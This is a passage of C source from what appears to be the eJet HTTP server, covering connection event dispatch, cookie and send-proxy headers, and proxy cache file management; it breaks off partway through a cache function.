* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_header.h"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_pump.h"
#include "http_srv.h"
#include "http_con.h"
#include "http_cli_io.h"
#include "http_srv_io.h"
#include "http_handle.h"
#include "http_ssl.h"
int http_pump (void * vmgmt, void * vobj, int event, int fdtype)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
HTTPListen * hl = NULL;
ulong conid = 0;
int cmd = 0;
if (!mgmt) return -1;
switch (event) {
case IOE_ACCEPT:
if (fdtype != FDT_LISTEN)
return -1;
hl = (HTTPListen *)http_listen_find(mgmt, iodev_lip(vobj), iodev_lport(vobj));
if (!hl) return -1;
return http_cli_accept(mgmt, vobj);
case IOE_INVALID_DEV:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->pdev == vobj) {
tolog(1, "eJet - TCP Connect: invalid connection to '%s:%d'.\n",
pcon->dstip, pcon->dstport);
return http_con_close(pcon);
}
break;
case IOE_READ:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->pdev == vobj) {
if (fdtype == FDT_ACCEPTED) {
if (pcon->ssl_link && !pcon->ssl_handshaked)
return http_ssl_accept(pcon);
else
return http_cli_recv(pcon);
} else if (fdtype == FDT_CONNECTED) {
if (pcon->ssl_link && !pcon->ssl_handshaked)
return http_ssl_connect(pcon);
else
return http_srv_recv(pcon);
} else
return -1;
} else {
return -20;
}
break;
case IOE_WRITE:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->pdev == vobj) {
if (fdtype == FDT_ACCEPTED) {
if (pcon->ssl_link && !pcon->ssl_handshaked)
return http_ssl_accept(pcon);
else
return http_cli_send(pcon);
} else if (fdtype == FDT_CONNECTED) {
if (pcon->ssl_link && !pcon->ssl_handshaked)
return http_ssl_connect(pcon);
else
return http_srv_send(pcon);
} else
return -1;
} else {
return -20;
}
break;
case IOE_TIMEOUT:
cmd = iotimer_cmdid(vobj);
if (cmd == t_http_srv_con_life) {
conid = (ulong)iotimer_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->life_timer == vobj) {
http_srv_con_lifecheck(pcon);
}
return 0;
} else if (cmd == t_http_cli_con_life) {
conid = (ulong)iotimer_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->life_timer == vobj) {
http_cli_con_lifecheck(pcon);
}
return 0;
} else if (cmd == t_http_srv_con_build) {
conid = (ulong)iotimer_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->ready_timer == vobj) {
http_con_connect(pcon);
}
return 0;
} else if (cmd == t_httpsrv_life) {
ulong srvid = 0;
HTTPSrv * srv = NULL;
srvid = (ulong)iotimer_para(vobj);
srv = http_mgmt_srv_get(mgmt, srvid);
if (srv && srv->life_timer == vobj) {
http_srv_lifecheck(srv);
}
return 0;
}
break;
case IOE_CONNECTED:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
EnterCriticalSection(&pcon->rcvCS);
if (pcon && pcon->pdev == vobj) {
LeaveCriticalSection(&pcon->rcvCS);
return http_con_connected(pcon);
} else {
LeaveCriticalSection(&pcon->rcvCS);
return -20;
}
break;
case IOE_CONNFAIL:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->pdev == vobj) {
tolog(1, "eJet - TCP Connect: failed to build connection to '%s:%d'.\n",
pcon->dstip, pcon->dstport);
} else {
return -20;
}
break;
default:
return -1;
}
return -1;
}
void print_pump_arg (void * vobj, int event, int fdtype)
{
#ifdef _DEBUG
char buf[256];
buf[0] = '\0';
sprintf(buf+strlen(buf), "HTTP_Pump: ");
if (event == IOE_CONNECTED) sprintf(buf+strlen(buf), "IOE_CONNECTED");
else if (event == IOE_CONNFAIL) sprintf(buf+strlen(buf), "IOE_CONNFAIL");
else if (event == IOE_ACCEPT) sprintf(buf+strlen(buf), "IOE_ACCEPT");
else if (event == IOE_READ) sprintf(buf+strlen(buf), "IOE_READ");
else if (event == IOE_WRITE) sprintf(buf+strlen(buf), "IOE_WRITE");
else if (event == IOE_TIMEOUT) sprintf(buf+strlen(buf), "IOE_TIMEOUT");
else if (event == IOE_INVALID_DEV) sprintf(buf+strlen(buf), "IOE_INVALID_DEV");
else sprintf(buf+strlen(buf), "Unknown");
if (event != IOE_TIMEOUT) {
sprintf(buf+strlen(buf), " ");
if (fdtype == FDT_LISTEN) sprintf(buf+strlen(buf), "FDT_LISTEN");
else if (fdtype == FDT_CONNECTED) sprintf(buf+strlen(buf), "FDT_CONNECTED");
else if (fdtype == FDT_ACCEPTED) sprintf(buf+strlen(buf), "FDT_ACCEPTED");
else if (fdtype == FDT_UDPSRV) sprintf(buf+strlen(buf), "FDT_UDPSRV");
else if (fdtype == FDT_UDPCLI) sprintf(buf+strlen(buf), "FDT_UDPCLI");
else if (fdtype == FDT_RAWSOCK) sprintf(buf+strlen(buf), "FDT_RAWSOCK");
else if (fdtype == FDT_TIMER) sprintf(buf+strlen(buf), "FDT_TIMER");
else if (fdtype == FDT_LINGER_CLOSE) sprintf(buf+strlen(buf), "FDT_LINGER_CLOSE");
else if (fdtype == FDT_STDIN) sprintf(buf+strlen(buf), "FDT_STDIN");
else if (fdtype == FDT_STDOUT) sprintf(buf+strlen(buf), "FDT_STDOUT");
else if (fdtype == FDT_USOCK_LISTEN) sprintf(buf+strlen(buf), "FDT_USOCK_LISTEN");
else if (fdtype == FDT_USOCK_CONNECTED) sprintf(buf+strlen(buf), "FDT_USOCK_CONNECTED");
else if (fdtype == FDT_USOCK_ACCEPTED) sprintf(buf+strlen(buf), "FDT_USOCK_ACCEPTED");
else sprintf(buf+strlen(buf), "Unknown Type");
sprintf(buf+strlen(buf), " FD=%d R<%s:%d> L<%s:%d>",
iodev_fd(vobj), iodev_rip(vobj), iodev_rport(vobj),
iodev_lip(vobj), iodev_lport(vobj));
} else {
if (vobj) {
sprintf(buf+strlen(buf), " CmdID=%d ID=%lu WID=%lu",
iotimer_cmdid(vobj), iotimer_id(vobj), iotimer_workerid(vobj));
}
}
printf("%s\n", buf);
#endif
}
<|start_filename|>include/http_sndpxy.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SNDPXY_H_
#define _HTTP_SNDPXY_H_
#ifdef UNIX
#include <regex.h>
#endif
#if defined(_WIN32) || defined(_WIN64)
#define PCRE_STATIC 1
#include "pcre.h"
#endif
#ifdef __cplusplus
extern "C" {
#endif
typedef struct cli_send_proxy_s {
char * host;
#ifdef UNIX
regex_t * preg;
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * preg;
#endif
char * proxy;
int port;
} SendProxy;
int http_send_proxy_init (void * vmgmt);
void http_send_proxy_clean (void * vmgmt);
int http_send_proxy_check (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_cookie.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_COOKIE_H_
#define _HTTP_COOKIE_H_
#ifdef __cplusplus
extern "C" {
#endif
#define t_http_cookie_scan 2170
typedef struct http_cookie_ {
/* do not contain following characters:
CTRLs Space \t ( ) < > @ , ; : \ " / [ ] ? = { } */
char * name;
int namelen;
/* do not contain following characters:
CTRLs Space " , ; \ */
char * value;
int valuelen;
char * path;
int pathlen;
char * domain;
int domainlen;
time_t expire;
int maxage;
uint8 httponly;
uint8 secure;
uint8 samesite; //0-unknown 1-Strict 2-Lax
time_t createtime;
void * ckpath;
} HTTPCookie, cookie_t;
void * http_cookie_alloc ();
void http_cookie_free (void * vckie);
typedef struct cookie_path_ {
char path[128];
arr_t * cookie_list;
} cookie_path_t, CookiePath;
void * cookie_path_alloc ();
void cookie_path_free (void * vpath);
typedef struct cookie_domain_ {
char domain[128];
actrie_t * cookie_path_trie;
arr_t * cookie_path_list;
} cookie_domain_t, CookieDomain;
void * cookie_domain_alloc ();
void cookie_domain_free (void * vdomain);
typedef struct http_cookie_mgmt {
/* reverse multi-pattern matching based on domain */
CRITICAL_SECTION cookieCS;
actrie_t * domain_trie;
hashtab_t * domain_table;
/* all cookies list under different domains and paths */
arr_t * cookie_list;
/* scan the cookie list to remove the expired cookies every 300 seconds */
void * scan_timer;
char * cookie_file;
void * httpmgmt;
} CookieMgmt, cookie_mgmt_t;
void * cookie_mgmt_alloc (void * vhttpmgmt, char * ckiefile);
void cookie_mgmt_free (void * vmgmt);
int cookie_mgmt_read (void * vmgmt, char * cookiefile);
int cookie_mgmt_write (void * vmgmt, char * cookiefile);
int cookie_mgmt_scan (void * vmgmt);
int cookie_mgmt_add (void * vmgmt, void * vckie);
void * cookie_mgmt_get (void * vmgmt, char * domain, int domainlen,
char * path, int pathlen, char * ckiename, int ckienlen);
int cookie_mgmt_mget(void * vmgmt, char * domain, int domainlen, char * path, int pathlen, arr_t ** cklist);
int cookie_mgmt_set (void * vmgmt, char * ckname, int cknlen, char * ckvalue, int ckvlen,
char * domain, int domainlen, char * path, int pathlen, time_t expire,
int maxage, uint8 httponly, uint8 secure, uint8 samesite);
int cookie_mgmt_parse (void * vmgmt, char * setcookie, int len, char * defdom, int defdomlen);
int cookie_callback (void * vmgmt, void * vobj, int event, int fdtype);
int http_cookie_add (void * vmsg);
int http_set_cookie_parse (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_cache.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_listen.h"
#include "http_variable.h"
#include "http_cache.h"
extern HTTPMgmt * gp_httpmgmt;
void * cache_info_alloc ()
{
CacheInfo * cacinfo = NULL;
cacinfo = kzalloc(sizeof(*cacinfo));
if (!cacinfo) return NULL;
InitializeCriticalSection(&cacinfo->cacheCS);
cacinfo->frag = frag_pack_alloc();
return cacinfo;
}
void cache_info_free (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return;
if (frag_pack_complete(cacinfo->frag)) {
if (strcmp(cacinfo->cache_tmp, cacinfo->cache_file) != 0)
rename(cacinfo->cache_tmp, cacinfo->cache_file);
}
if (cacinfo->cache_file) {
kfree(cacinfo->cache_file);
cacinfo->cache_file = NULL;
}
if (cacinfo->cache_tmp) {
kfree(cacinfo->cache_tmp);
cacinfo->cache_tmp = NULL;
}
if (cacinfo->info_file) {
kfree(cacinfo->info_file);
cacinfo->info_file = NULL;
}
if (cacinfo->hinfo) {
native_file_close(cacinfo->hinfo);
cacinfo->hinfo = NULL;
}
if (cacinfo->frag) {
frag_pack_free(cacinfo->frag);
cacinfo->frag = NULL;
}
DeleteCriticalSection(&cacinfo->cacheCS);
kfree(cacinfo);
}
int cache_info_zero (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return -1;
if (cacinfo->cache_file) {
kfree(cacinfo->cache_file);
cacinfo->cache_file = NULL;
}
if (cacinfo->cache_tmp) {
kfree(cacinfo->cache_tmp);
cacinfo->cache_tmp = NULL;
}
if (cacinfo->info_file) {
kfree(cacinfo->info_file);
cacinfo->info_file = NULL;
}
if (cacinfo->hinfo) {
native_file_close(cacinfo->hinfo);
cacinfo->hinfo = NULL;
}
cacinfo->body_flag = 0;
cacinfo->header_length = 0;
cacinfo->body_length = 0;
cacinfo->body_rcvlen = 0;
cacinfo->directive = 0;
cacinfo->revalidate = 0;
cacinfo->pubattr = 0;
cacinfo->ctime = 0;
cacinfo->expire = 0;
cacinfo->maxage = 0;
cacinfo->mtime = 0;
memset(cacinfo->etag, 0, sizeof(cacinfo->etag));
if (cacinfo->frag) {
frag_pack_zero(cacinfo->frag);
}
return 0;
}
int64 cache_info_body_length (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return -1;
return cacinfo->body_length;
}
static char * cache_info_file (char * cafile, int cafnlen)
{
int pathlen = 0;
char * fname = NULL;
int fnlen = 0;
char * p = NULL;
int len = 0;
if (!cafile) return NULL;
if (cafnlen < 0) cafnlen = strlen(cafile);
if (cafnlen <= 0) return NULL;
p = rskipTo(cafile + cafnlen - 1, cafnlen, "/\\", 2);
if (p < cafile) {
fname = cafile;
fnlen = cafnlen;
pathlen = 0;
} else {
fname = p + 1;
fnlen = cafile + cafnlen - fname;
pathlen = fname - cafile;
}
/* path/.cacheinfo/fname.ext.cacinf, or ./.cacheinfo/fname.ext */
len = cafnlen + 2 + 11 + 7 + 1;
p = kalloc(len);
if (pathlen <= 0) {
#if defined(_WIN32) || defined(_WIN64)
strcpy(p, ".\\");
#else
strcpy(p, "./");
#endif
} else {
str_secpy(p, len-1, cafile, pathlen);
}
#if defined(_WIN32) || defined(_WIN64)
str_secpy(p + strlen(p), len - 1 - strlen(p), ".cacheinfo\\", 11);
#else
str_secpy(p + strlen(p), len - 1 - strlen(p), ".cacheinfo/", 11);
#endif
str_secpy(p + strlen(p), len - 1 - strlen(p), fname, fnlen);
str_secpy(p + strlen(p), len - 1 - strlen(p), ".cacinf", 7);
return p;
}
int cache_info_read (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
uint8 buf[96];
int val32 = 0;
int64 val64 = 0;
int iter = 0;
if (!cacinfo) return -1;
if (!cacinfo->hinfo) return -2;
native_file_seek(cacinfo->hinfo, 0);
native_file_read(cacinfo->hinfo, buf, 96);
if (strncasecmp((char *)buf + iter, "EJT", 3) != 0) {
return -100;
}
iter += 3;
memcpy(&val32, buf+iter, 4); iter += 4;
cacinfo->mimeid = ntohl(val32);
cacinfo->body_flag = buf[iter]; iter++;
memcpy(&val32, buf+iter, 4); iter += 4;
cacinfo->header_length = ntohl(val32);
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->body_length = ntohll(val64);
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->body_rcvlen = ntohll(val64);
cacinfo->directive = buf[iter]; iter++;
cacinfo->revalidate = buf[iter]; iter++;
cacinfo->pubattr = buf[iter]; iter++;
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->ctime = ntohll(val64);
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->expire = ntohll(val64);
memcpy(&val32, buf+iter, 4); iter += 4;
cacinfo->maxage = ntohl(val32);
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->mtime = ntohll(val64);
memcpy(cacinfo->etag, buf+iter, 32); iter += 32;
frag_pack_read(cacinfo->frag, cacinfo->hinfo, 96);
if (cacinfo->body_length > 0 && frag_pack_length(cacinfo->frag) <= 0)
frag_pack_set_length(cacinfo->frag, cacinfo->body_length);
return 0;
}
int cache_info_write_meta (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
uint8 buf[96];
int val32 = 0;
int64 val64 = 0;
int iter = 0;
if (!cacinfo) return -1;
if (!cacinfo->hinfo) return -2;
memset(buf, 0, sizeof(buf));
memcpy(buf+iter, "EJT", 3); iter += 3;
val32 = htonl(cacinfo->mimeid);
memcpy(buf+iter, &val32, 4); iter += 4;
buf[iter] = cacinfo->body_flag; iter++;
val32 = htonl(cacinfo->header_length);
memcpy(buf+iter, &val32, 4); iter += 4;
val64 = htonll(cacinfo->body_length);
memcpy(buf+iter, &val64, 8); iter += 8;
val64 = htonll(cacinfo->body_rcvlen);
memcpy(buf+iter, &val64, 8); iter += 8;
buf[iter] = cacinfo->directive; iter++;
buf[iter] = cacinfo->revalidate; iter++;
buf[iter] = cacinfo->pubattr; iter++;
val64 = cacinfo->ctime; val64 = htonll(val64);
memcpy(buf+iter, &val64, 8); iter += 8;
val64 = cacinfo->expire; val64 = htonll(val64);
memcpy(buf+iter, &val64, 8); iter += 8;
val32 = cacinfo->maxage; val32 = htonl(val32);
memcpy(buf+iter, &val32, 4); iter += 4;
val64 = cacinfo->mtime; val64 = htonll(val64);
memcpy(buf+iter, &val64, 8); iter += 8;
str_secpy(buf+iter, 32, cacinfo->etag, str_len(cacinfo->etag));
iter += 32;
native_file_seek(cacinfo->hinfo, 0);
native_file_write(cacinfo->hinfo, buf, 96);
return 0;
}
int cache_info_write_frag (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return -1;
if (!cacinfo->hinfo) return -2;
return frag_pack_write(cacinfo->frag, cacinfo->hinfo, 96);
}
int cache_info_write (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
int len = 0;
if (!cacinfo) return -1;
if (!cacinfo->hinfo) return -2;
cache_info_write_meta(cacinfo);
len = cache_info_write_frag(cacinfo);
if (len >= 12) {
native_file_resize(cacinfo->hinfo, 96 + len);
}
return 0;
}
int cache_info_add_frag (void * vcacinfo, int64 pos, int64 len, int complete)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
int fragnum = 0;
int64 rcvlen = 0;
int ret = 0;
if (!cacinfo) return -1;
if (!cacinfo->frag) return -2;
EnterCriticalSection(&cacinfo->cacheCS);
frag_pack_add(cacinfo->frag, pos, len);
cacinfo->body_rcvlen += len;
if (complete) {
rcvlen = frag_pack_rcvlen(cacinfo->frag, &fragnum);
if (fragnum == 1 && rcvlen == frag_pack_curlen(cacinfo->frag)) {
frag_pack_set_length(cacinfo->frag, rcvlen);
cacinfo->body_length = rcvlen;
}
}
ret = cache_info_write(cacinfo);
LeaveCriticalSection(&cacinfo->cacheCS);
return ret;
}
int cache_info_verify (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return -1;
if (cacinfo->directive > 0) //0-max-age 1-no cache 2-no store
return 0;
if (cacinfo->revalidate > 0) //0-none 1-must-revalidate
return 0;
if (cacinfo->expire > 0 && cacinfo->expire > time(NULL))
return 0;
if (cacinfo->maxage > 0 && cacinfo->mtime + cacinfo->maxage > time(NULL))
return 0;
return 1;
}
int cache_info_cmp_key (void * a, void * b)
{
CacheInfo * cacinfo = (CacheInfo *)a;
char * fname = (char *)b;
if (!a) return -1;
if (!b) return 1;
return strcmp(cacinfo->cache_file, fname);
}
int http_cache_info_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
InitializeCriticalSection(&mgmt->cacinfoCS);
mgmt->cacinfo_table = ht_new(200, cache_info_cmp_key);
tolog(1, "eJet - Proxy Cache resource allocated successfully.\n");
return 0;
}
int http_cache_info_clean (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
DeleteCriticalSection(&mgmt->cacinfoCS);
if (mgmt->cacinfo_table) {
ht_free_all(mgmt->cacinfo_table, cache_info_free);
mgmt->cacinfo_table = NULL;
}
tolog(1, "eJet - Proxy Cache resources cleaned.\n");
return 0;
}
void * cache_info_open (void * vmgmt, char * cafile)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
CacheInfo * cacinfo = NULL;
int cafnlen = 0;
struct stat st;
char * fname = NULL;
void * hinfo = NULL;
if (!mgmt) return NULL;
if (!cafile || (cafnlen = strlen(cafile)) <= 0)
return NULL;
EnterCriticalSection(&mgmt->cacinfoCS);
cacinfo = ht_get(mgmt->cacinfo_table, cafile);
if (cacinfo) {
cacinfo->count++;
LeaveCriticalSection(&mgmt->cacinfoCS);
return cacinfo;
}
/* according to actual filename.ext, generate cacheinfo file: ./.cacheinfo/filename.ext.cacinf */
fname = cache_info_file(cafile, cafnlen);
if (!fname) goto nullret;
if (file_stat(fname, &st) < 0) {//Cache Info file not exist
kfree(fname);
goto nullret;
}
hinfo = native_file_open(fname, NF_READ | NF_WRITE);
if (!hinfo) {
kfree(fname);
goto nullret;
}
cacinfo = cache_info_alloc();
if (!cacinfo) {
kfree(fname);
native_file_close(hinfo);
goto nullret;
}
cacinfo->httpmgmt = mgmt;
cacinfo->info_file = fname;
cacinfo->hinfo = hinfo;
if (cache_info_read(cacinfo) < 0) {
cache_info_free(cacinfo);
goto nullret;
}
cacinfo->cache_file = str_dup(cafile, cafnlen);
cacinfo->cache_tmp = kzalloc(cafnlen + 4 + 1);
sprintf(cacinfo->cache_tmp, "%s.tmp", cafile);
if (frag_pack_curlen(cacinfo->frag) > 0 &&
frag_pack_complete(cacinfo->frag) == 0 &&
(file_stat(cacinfo->cache_tmp, &st) < 0 || st.st_size <= 0))
{
frag_pack_zero(cacinfo->frag);
cacinfo->body_rcvlen = 0;
}
cacinfo->count = 1;
ht_set(mgmt->cacinfo_table, cafile, cacinfo);
LeaveCriticalSection(&mgmt->cacinfoCS);
return cacinfo;
nullret:
LeaveCriticalSection(&mgmt->cacinfoCS);
return NULL;
}
void cache_info_close (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
HTTPMgmt * mgmt = NULL;
if (!cacinfo) return;
mgmt = gp_httpmgmt;
if (!mgmt) mgmt = cacinfo->httpmgmt;
if (!mgmt) return;
EnterCriticalSection(&mgmt->cacinfoCS);
cacinfo = ht_get(mgmt->cacinfo_table, cacinfo->cache_file);
if (!cacinfo) {
LeaveCriticalSection(&mgmt->cacinfoCS);
return;
}
if (--cacinfo->count <= 0) {
ht_delete(mgmt->cacinfo_table, cacinfo->cache_file);
cache_info_free(cacinfo);
LeaveCriticalSection(&mgmt->cacinfoCS);
return;
}
LeaveCriticalSection(&mgmt->cacinfoCS);
}
void * cache_info_create (void * vmgmt, char * cafile, int64 fsize)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
CacheInfo * cacinfo = NULL;
int cafnlen = 0;
char * fname = NULL;
void * hinfo = NULL;
if (!mgmt) return NULL;
if (!cafile || (cafnlen = strlen(cafile)) <= 0)
return NULL;
EnterCriticalSection(&mgmt->cacinfoCS);
cacinfo = ht_get(mgmt->cacinfo_table, cafile);
if (cacinfo) {
cacinfo->count++;
if (fsize > 0) {
cacinfo->body_length = fsize;
frag_pack_set_length(cacinfo->frag, fsize);
}
LeaveCriticalSection(&mgmt->cacinfoCS);
return cacinfo;
}
fname = cache_info_file(cafile, cafnlen);
if (!fname) goto nullret;
file_dir_create(fname, 1);
hinfo = native_file_open(fname, NF_READ | NF_WRITE);
if (!hinfo) {
kfree(fname);
goto nullret;
}
cacinfo = cache_info_alloc();
if (!cacinfo) {
kfree(fname);
native_file_close(hinfo);
goto nullret;
}
cacinfo->httpmgmt = mgmt;
cacinfo->info_file = fname;
cacinfo->hinfo = hinfo;
cacinfo->cache_file = str_dup(cafile, cafnlen);
cacinfo->cache_tmp = kzalloc(cafnlen + 4 + 1);
sprintf(cacinfo->cache_tmp, "%s.tmp", cafile);
if (fsize > 0) {
cacinfo->body_length = fsize;
frag_pack_set_length(cacinfo->frag, fsize);
}
cacinfo->count = 1;
ht_set(mgmt->cacinfo_table, cafile, cacinfo);
LeaveCriticalSection(&mgmt->cacinfoCS);
return cacinfo;
nullret:
LeaveCriticalSection(&mgmt->cacinfoCS);
return NULL;
}
int http_request_cache_init (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
char path[512];
ulong hash;
char * ctype = NULL;
char * extname = NULL;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
if (msg->req_file_handle) return 0;
#if defined(_WIN32) || defined(_WIN64)
snprintf(path, sizeof(path) - 1, "%s\\ucache", msg->GetRootPath(msg));
#else
snprintf(path, sizeof(path) - 1, "%s/ucache", msg->GetRootPath(msg));
#endif
hash = generic_hash(msg->docuri->path, msg->docuri->pathlen, 0);
hash = hash % 307;
#if defined(_WIN32) || defined(_WIN64)
sprintf(path+strlen(path), "\\%lu\\", hash);
#else
sprintf(path+strlen(path), "/%lu/", hash);
#endif
file_dir_create(path, 0);
msg->GetReqContentTypeP(msg, &ctype, NULL);
mime_type_get_by_mime(mgmt->mimemgmt, ctype, &extname, NULL, NULL);
sprintf(path+strlen(path), "%s-%ld%s",
msg->srcip, msg->msgid, extname);
msg->req_file_name = str_dup(path, strlen(path));
msg->req_file_handle = native_file_open(path, NF_WRITEPLUS);
msg->req_file_cache = 1;
if (native_file_size(msg->res_file_handle) > 0) {
native_file_resize(msg->res_file_handle, 0);
}
return 1;
}
int http_response_cache_init (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPLoc * ploc = NULL;
char * cachefn = NULL;
int fnlen = 0;
char buf[2048];
int ret = 0;
http_partial_t * part = NULL;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
if (msg->res_file_handle)
return 0;
if (msg->res_store_file) {
msg->res_file_handle = native_file_open(msg->res_store_file, NF_WRITEPLUS);
msg->res_file_cache = 2;
if (msg->res_file_handle && msg->res_store_offset > 0) {
native_file_seek(msg->res_file_handle, msg->res_store_offset);
} else if (native_file_size(msg->res_file_handle) > 0) {
native_file_resize(msg->res_file_handle, 0);
}
goto end;
}
ploc = (HTTPLoc *)msg->ploc;
if (ploc) {
if (ploc->cache == 0 || str_len(ploc->cachefile) <= 0)
return 0;
cachefn = ploc->cachefile;
fnlen = strlen(cachefn);
} else {
if (mgmt->srv_resp_cache == 0 || strlen(mgmt->srv_resp_cache_file) <= 0)
return 0;
cachefn = mgmt->srv_resp_cache_file;
fnlen = strlen(cachefn);
}
ret = http_var_copy(msg, cachefn, fnlen, buf, sizeof(buf)-1, NULL, 0, "cache file", 4);
if (ret <= 0) return 0;
for (ret = 0; ret < (int)strlen(buf); ret++) {
if (buf[ret] == ':') { //ignore the colon in drive of path D:\prj\src\disk.txt
if (ret > 1) buf[ret] = '_';
} else if (buf[ret] == '?') buf[ret] = '_';
#if defined(_WIN32) || defined(_WIN64)
else if (buf[ret] == '/') buf[ret] = '\\';
#endif
}
msg->res_file_name = str_dup(buf, strlen(buf));
file_dir_create(msg->res_file_name, 1);
msg->res_file_handle = native_file_open(msg->res_file_name, NF_WRITEPLUS);
msg->res_file_cache = 1;
/* if client request contains Range header, then we should seek to given pos */
if (msg->partial_flag > 0) {
part = vstar_get(msg->partial_list, 0);
if (part && part->start > 0)
native_file_seek(msg->res_file_handle, part->start);
}
/*if (native_file_size(msg->res_file_handle) > 0) {
native_file_resize(msg->res_file_handle, 0);
}*/
end:
return msg->res_file_cache;
}
int http_request_in_cache (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_partial_t * part = NULL;
CacheInfo * cacinfo = NULL;
int64 gappos = 0;
int64 gaplen = 0;
int64 reqpos = 0;
int64 reqlen = 0;
int64 start = 0;
int64 length = 0;
int i, num, ret;
int incache = 1;
uint8 execed = 0;
if (!msg) return -1;
cacinfo = msg->res_cache_info;
if (!cacinfo) return 0;
/* check the client request data is in local cache completely.
if client request contains Range header, then we should seek to given pos */
incache = 1;
if (msg->partial_flag > 0) {
num = vstar_num(msg->partial_list);
for (i = 0; i < num; i++) {
part = vstar_get(msg->partial_list, i);
if (!part) continue;
if (part->partflag == 1) {
start = part->start;
length = part->length;
} else if (part->partflag == 2) {
start = part->start;
if (cacinfo->body_length > 0)
length = cacinfo->body_length - start;
else
length = -1;
} else if (part->partflag == 3) {
length = part->length;
if (cacinfo->body_length > 0)
start = cacinfo->body_length - length;
else
start = cacinfo->body_rcvlen - length;
} else {
start = part->start;
length = part->length;
}
ret = frag_pack_contain(cacinfo->frag, start, length,
&reqpos, &reqlen, &gappos, &gaplen);
if (ret < 3) { //ret 0:not in cache 1:right-side partial 2:left-side partial 3:in cache
incache = 0;
}
execed = 1;
msg->cache_req_off = gappos;
msg->cache_req_len = gaplen;
msg->cache_req_start = start;
break;
}
}
if (!execed) {
ret = frag_pack_contain(cacinfo->frag, 0, -1, &reqpos, &reqlen, &gappos, &gaplen);
if (ret < 3) { //ret 0:not in cache 1:right-side partial 2:left-side partial 3:in cache
incache = 0;
}
msg->cache_req_off = gappos;
msg->cache_req_len = gaplen;
msg->cache_req_start = 0;
}
return incache;
}
int http_proxy_cache_open (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPLoc * ploc = NULL;
char * cachefn = NULL;
int fnlen = 0;
char buf[1024];
int ret = 0;
CacheInfo * cacinfo = NULL;
int incache = 0;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
ploc = (HTTPLoc *)msg->ploc;
if (ploc) {
if (ploc->cache == 0 || str_len(ploc->cachefile) <= 0) {
msg->cacheon = 0;
return 0;
}
cachefn = ploc->cachefile;
fnlen = strlen(cachefn);
} else {
if (mgmt->srv_resp_cache == 0 || strlen(mgmt->srv_resp_cache_file) <= 0) {
msg->cacheon = 0;
return 0;
}
cachefn = mgmt->srv_resp_cache_file;
fnlen = strlen(cachefn);
}
msg->cacheon = 1;
ret = http_var_copy(msg, cachefn, fnlen, buf, sizeof(buf)-1, NULL, 0, "cache file", 4);
if (ret <= 0) {
msg->cacheon = 0;
return 0;
}
for (ret = 0; ret < (int)strlen(buf); ret++) {
if (buf[ret] == ':') { //ignore the colon in drive of path D:\prj\src\disk.txt
